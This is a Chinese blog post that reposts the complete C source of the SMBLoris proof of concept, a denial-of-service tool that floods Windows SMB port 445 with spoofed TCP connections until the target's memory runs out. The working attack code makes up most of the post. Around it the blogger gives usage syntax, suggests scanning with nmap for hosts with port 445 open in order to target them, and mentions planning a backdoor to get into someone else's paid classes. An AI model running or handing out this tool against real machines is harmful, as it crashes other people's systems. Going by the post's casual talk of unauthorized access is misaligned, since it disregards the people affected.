WIN10__针对SMB的那啥

又是一个周三
今天不知道写点什么= =
就搬运点东西吧～～～
具体就是题目
大多数Windows操作系统都会开启445 139此类的端口（比如我的几个室友）
所以说针对这个情况就有人写了一个脚本专门针对SMB进行攻击
原ＰＯ见https://twitter.com/marcan42/status/892706927720808449　　（有条件的看一下）
脚本github地址　https://gist.github.com/marcan/6a2d14b0e3eaa5de1795a763fb58641e


/* SMBLoris attack proof-of-concept* * Copyright 2017 Hector Martin "marcan" <marcan@marcan.st>** Licensed under the terms of the 2-clause BSD license.** This is a proof of concept of a publicly disclosed vulnerability.* Please do not go around randomly DoSing people with it.** Tips: do not use your local IP as source, or if you do, use iptables to block* outbound RST packets. You may want to increase your local conntrack limit:*   echo 1200000 > /proc/sys/net/netfilter/nf_conntrack_max*/
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <net/ethernet.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <net/if_arp.h>
#define CHECK(cond, name) if (cond) { perror(name); exit(1); }
#define MIN_PORT 1
#define MAX_PORT 65535
struct {char *iface;uint8_t hwaddr[6];uint32_t src_min;uint32_t src_max;uint32_t dst;struct sockaddr_in dst_sa;
} cfg;
static void usage(const char *argv0) {fprintf(stderr, "Usage: %s <iface> <src_ip_start> <src_ip_end> <dst_ip>\n", argv0);exit(1);
}
uint32_t parse_ip(const char *s) {int a,b,c,d;if (sscanf(s, "%d.%d.%d.%d", &a, &b, &c, &d) != 4) {fprintf(stderr, "Failed to parse IPv4 address %s\n", s);exit(1);}return (a<<24) | (b<<16) | (c<<8) | d;
}
uint16_t fold(uint32_t v) {return (v & 0xffff) + (v >> 16);
}
uint32_t csum(void *buf, int len)
{uint32_t s = 0;uint16_t *p = buf;while (len) {s += *p++;len -= 2;}return s;
}
void get_hwaddr(const char *iface, uint8_t *hwaddr)
{int sock = socket(PF_INET, SOCK_PACKET, htons(ETH_P_ARP));CHECK(sock < 0, "socket(PF_INET, SOCK_PACKET, ETH_P_ARP)");struct ifreq req;strncpy(req.ifr_name, iface, sizeof(req.ifr_name));CHECK(ioctl(sock, SIOCGIFHWADDR, &req) < 0, "ioctl(SIOCGIFHWADDR)");memcpy(cfg.hwaddr, req.ifr_hwaddr.sa_data, 6);close(sock);
}
void send_arp(uint32_t addr)
{struct sockaddr sa;strncpy(sa.sa_data, cfg.iface, sizeof(sa.sa_data));struct {struct ether_header eth;struct arphdr arp;uint8_t ar_sha[6];uint32_t ar_sip;uint8_t ar_tha[6];uint32_t ar_tip;} __attribute__((packed)) pkt;memset(&pkt, 0, sizeof(pkt));memset(&pkt.eth.ether_dhost, 0xff, 6);memcpy(&pkt.eth.ether_shost, cfg.hwaddr, 6);pkt.eth.ether_type = htons(ETHERTYPE_ARP);pkt.arp.ar_hrd = htons(1);pkt.arp.ar_pro = htons(ETH_P_IP);pkt.arp.ar_hln = 6;pkt.arp.ar_pln = 4;pkt.arp.ar_op = htons(ARPOP_REQUEST);memcpy(pkt.ar_sha, cfg.hwaddr, ETH_ALEN);pkt.ar_sip = htonl(addr);memset(pkt.ar_tha, 0xff, ETH_ALEN);pkt.ar_tip = htonl(addr);int sock = socket(PF_INET, SOCK_PACKET, htons(ETH_P_ARP));CHECK (sock < 0, "socket(PF_INET, SOCK_PACKET, ETH_P_ARP)");CHECK(sendto(sock, &pkt, sizeof(pkt), 0, &sa, sizeof(sa)) < 0, "sendto(gratuitous ARP)");close(sock);
}
int sent_packets = 0, errors = 0, replies = 0, rsts = 0, last_errno = 0;
void process_replies(int sock, int rsock)
{struct {struct iphdr ip;struct tcphdr tcp;uint8_t data[32];} reply;while (1) {int ret = recv(rsock, &reply, sizeof(reply), 0);if (ret < 0 && errno == EAGAIN)return;CHECK(ret < 0, "recv");if (reply.ip.saddr != htonl(cfg.dst))continue;if (ntohl(reply.ip.daddr) < cfg.src_min ||ntohl(reply.ip.daddr) > cfg.src_max)continue;if (reply.ip.protocol != IPPROTO_TCP || reply.tcp.source != htons(445))continue;if (reply.tcp.rst || reply.tcp.fin) {rsts++;continue;}if (!reply.tcp.ack || !reply.tcp.syn)continue;struct {struct iphdr ip;struct tcphdr tcp;uint8_t payload[4];} __attribute__((packed)) pkt;memset(&pkt, 0, sizeof(pkt));pkt.ip.ihl = 5;pkt.ip.version = 4;pkt.ip.ttl = 128;pkt.ip.protocol = IPPROTO_TCP;pkt.ip.saddr = reply.ip.daddr;pkt.ip.daddr = htonl(cfg.dst);pkt.tcp.dest = htons(445);pkt.tcp.source = reply.tcp.dest;pkt.tcp.doff = 5;pkt.tcp.window = htons(5840);pkt.tcp.ack = 1;pkt.tcp.ack_seq = htonl(ntohl(reply.tcp.seq) + 1);pkt.tcp.seq = reply.tcp.ack_seq;memcpy(pkt.payload, "\x00\x01\xff\xff", 4);uint32_t sum = csum(&pkt.ip.saddr, 8) + htons(IPPROTO_TCP) + htons(sizeof(struct tcphdr) + 4) + csum(&pkt.tcp, sizeof(struct tcphdr) + 4);pkt.tcp.check = 0xffff - fold(sum);if (pkt.tcp.check == 0)pkt.tcp.check = 0xffff;ret = sendto(sock, &pkt, sizeof pkt, 0, (struct sockaddr*)&cfg.dst_sa, sizeof(cfg.dst_sa));if (ret < 0) {errors++;last_errno = errno;} else {replies++;}}
}
int main(int argc, char **argv)
{if (argc != 5) {usage(argv[0]);}cfg.iface = argv[1];cfg.src_min = parse_ip(argv[2]);cfg.src_max = parse_ip(argv[3]);cfg.dst = parse_ip(argv[4]);get_hwaddr(cfg.iface, cfg.hwaddr);fprintf(stderr, "Local MAC address: %02x:%02x:%02x:%02x:%02x:%02x\n",cfg.hwaddr[0], cfg.hwaddr[1], cfg.hwaddr[2],cfg.hwaddr[3], cfg.hwaddr[4], cfg.hwaddr[5]);int sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);CHECK(sock < 0, "socket(AF_INET, SOCK_RAW, IPPROTO_RAW)");int rsock = socket(AF_PACKET, SOCK_DGRAM | SOCK_NONBLOCK, htons(ETH_P_IP));CHECK(rsock < 0, "socket(AF_INET, SOCK_DGRAM, ETH_P_IP)");struct {struct iphdr ip;struct tcphdr tcp;} __attribute__((packed)) pkt;memset(&pkt, 0, sizeof(pkt));pkt.ip.ihl = 5;pkt.ip.version = 4;pkt.ip.ttl = 128;pkt.ip.protocol = IPPROTO_TCP;pkt.ip.daddr = htonl(cfg.dst);pkt.tcp.dest = htons(445);pkt.tcp.doff = 5;pkt.tcp.window = htons(5840);pkt.tcp.syn = 1;memset(&cfg.dst_sa, 0, sizeof(cfg.dst_sa));cfg.dst_sa.sin_family = AF_INET;cfg.dst_sa.sin_port = 0;cfg.dst_sa.sin_addr.s_addr = htonl(cfg.dst);uint32_t src;int port;for (src = cfg.src_min; src <= cfg.src_max; src++) {pkt.ip.saddr = htonl(src);pkt.tcp.source = 0;pkt.tcp.check = 0;uint32_t sum = csum(&pkt.ip.saddr, 8) + htons(IPPROTO_TCP) + htons(sizeof(struct tcphdr)) + csum(&pkt.tcp, sizeof(struct tcphdr));send_arp(src);for (port = MIN_PORT; port <= MAX_PORT; port++) {pkt.tcp.source = htons(port);pkt.tcp.check = 0xffff - fold(sum + htons(port));if (pkt.tcp.check == 0)pkt.tcp.check = 0xffff;int ret = sendto(sock, &pkt, sizeof pkt, 0, (struct sockaddr*)&cfg.dst_sa, sizeof(cfg.dst_sa));if (ret < 0) {errors++;last_errno = errno;}sent_packets++;if (sent_packets % 100 == 0) {fprintf(stderr, "\r%08x:%04x %d sent, %d errors (%d), %d replies, %d resets", src, port, sent_packets, errors, last_errno, replies, rsts);send_arp(src);}process_replies(sock, rsock);}}fprintf(stderr, "\n");return 0;
}

我们编译一下

　　　下面是格式　./win10smb 网络接口　起始ＩＰ　终止ＩＰ　发起地址（作者说了不要用自己的ＩＰ）

这里就不做攻击示范了　哈哈哈哈
不过使用之前一定要用nmap 扫描一下　看看哪台主机开了４４５端口　有针对的打　
效果明显　很快靶机的内存就会急剧升高直到死机（如果有这个漏洞的话）

等下准备一下给自己手机装一个后门　过几天要去偷偷蹭别人家付费的课（没钱真可怕）

WIN10__针对SMB的那啥相关推荐

kali linux samba,Kali Linux 渗透测试：SMB、SMTP扫描工具（14）
一.SMB扫描工具 SMB(Server Message Block)协议,服务消息块协议. 最开始是用于微软的一种消息传输协议,因为颇受欢迎,现在已经成为跨平台的一种消息传输协议. 同时也是微软历史 ...
针对勒索病毒WannaCrypt微软官方应对指南
如同其他大多数勒索软件一样,Ransom:Win32/WannaCrypt通过社会工程学尝试感染目标组织的环境,通常为带有恶意宏的Office文档附件的钓鱼邮件.一旦感染环境中的一台计算机后,该变种会 ...
如何通过审计安全事件日志检测密码喷洒（Password Spraying）攻击
许多渗透测试人员和攻击者通常都会使用一种被称为"密码喷洒(Password Spraying)"的技术来进行测试和攻击.对密码进行喷洒式的攻击,这个叫法很形象,因为它属于自动化密码 ...
Kali Linux信息收集工具全
可能大部分渗透测试者都想成为网络空间的007,而我个人的目标却是成为Q先生! 看过007系列电影的朋友,应该都还记得那个戏份不多但一直都在的Q先生(由于年级太长目前已经退休).他为007发明了众多神奇 ...
20159208 《网络攻防实践》第七周学习总结
20159208 <网络攻防实践>第七周学习总结教材学习内容总结 20159208 <网络攻防实践>第七周学习总结教材学习内容总结本周主要学习了教材的第七章:Window ...
CTO关注：升级Win 10，除了更安全还有什么
我得承认,我的笔记本电脑还在使用Win 7系统.不要误会,我喜欢用Win 7,也习惯了用它.但从另一角度来说,做为生产力工具,它也的确早该升级到最新版本了. 我无意责怪公司IT人员阻止我使用微软新品, ...
20179214 2017-2018 2《网络攻防实践》第七周学习总结
视频学习漏洞利用之检索与利用有一个漏洞利用工具集 Exploit Databse searchsploit 可以借助关键词搜索出漏洞的相关信息. ikat自动化开启不同的exp.等待目标访问中招. ...
【网络安全】如何使用PacketSifter从pcap中筛选出有用的信息
关于PacketSifter PacketSifter这款工具旨在帮助广大研究/分析人员从捕捉到的数据包文件(pcap)中筛选出其中有价值或值得分析的流量数据.PacketSifter可以接受一个pc ...
《网络攻防实践》第七周作业
<Python 黑帽子>第六.九章 Black_Hat_Python_Chapter6 Black_Hat_Python_Chapter9 <网络攻防技术>第七章 Window ...

WIN10__针对SMB的那啥

WIN10__针对SMB的那啥相关推荐

最新文章

热门文章